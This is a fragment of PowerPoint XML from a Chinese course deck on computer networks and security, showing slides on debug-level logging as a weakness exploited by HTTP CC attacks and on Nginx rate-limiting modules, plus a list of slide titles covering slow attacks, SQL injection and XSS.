              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录了大量日志</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787A6D13-EF73-447E-91E1-AB01FAFC4CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>有的系统因为配置不合理，导致对所有的操作都进行了详细的日志记录。即：线上环境配置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>日志级别。这样会导致频繁大量的磁盘写操作，导致系统整体性能下降。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32480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3C77F-1185-4958-9FDA-13A47C0B24DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99794654-C3E3-4B9C-9DFC-5C708B4E26C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>请求限制模块：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ngx_http_limit_req_module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>流量限制模块：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ngx_http_limit_conn_module</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319152968"/>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TotalTime>
  <Words>1463</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>90</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宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>回顾</vt:lpstr>
      <vt:lpstr>计算机网络与安全</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>HTTP CC 攻击</vt:lpstr>
      <vt:lpstr>CC攻击的弱点——大页面</vt:lpstr>
      <vt:lpstr>CC攻击的弱点——信息列表</vt:lpstr>
      <vt:lpstr>CC攻击的弱点——搜索页面</vt:lpstr>
      <vt:lpstr>CC攻击的弱点——API接口</vt:lpstr>
      <vt:lpstr>CC攻击的弱点——记录了大量日志</vt:lpstr>
      <vt:lpstr>Nginx防护CC攻击的模块</vt:lpstr>
      <vt:lpstr>HTTP慢连接攻击</vt:lpstr>
      <vt:lpstr>慢发HTTP头</vt:lpstr>
      <vt:lpstr>慢发HTTP Body</vt:lpstr>
      <vt:lpstr>慢收HTTP Response</vt:lpstr>
      <vt:lpstr>Nginx抵御慢速攻击的配置</vt:lpstr>
      <vt:lpstr>HTTP SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入过程分析</vt:lpstr>
      <vt:lpstr>SQL注入过程分析</vt:lpstr>
      <vt:lpstr>SQL注入过程分析</vt:lpstr>
      <vt:lpstr>SQL注入过程分析</vt:lpstr>
      <vt:lpstr>一个例子</vt:lpstr>
      <vt:lpstr>SQL注入的防范</vt:lpstr>
      <vt:lpstr>HTTP XSS</vt:lpstr>
      <vt:lpstr>基于反射的XSS攻</vt:lpstr>
      <vt:lpstr>促发XSS</vt:lpstr>
      <vt:lpstr>利用XSS盗取cookie</vt:lpstr>
      <vt:lpstr>基于存储的XSS攻击</vt:lpstr>
      <vt:lpstr>HTTP 协议关键协议头——User-Agent</vt:lpstr>
      <vt:lpstr>HTTP 协议关键协议头—— x-forward-for</vt:lpstr>
      <vt:lpstr>HTTP 协议关键协议头——referer</vt:lpstr>
      <vt:lpstr>Home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计算机网络与安全</dc:title>
  <dc:creator>xu dong</dc:creator>
  <cp:lastModifiedBy>xu dong</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-09T07:26:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-09T08:01:55Z</dcterms:modified>
</cp:coreProperties>
</file>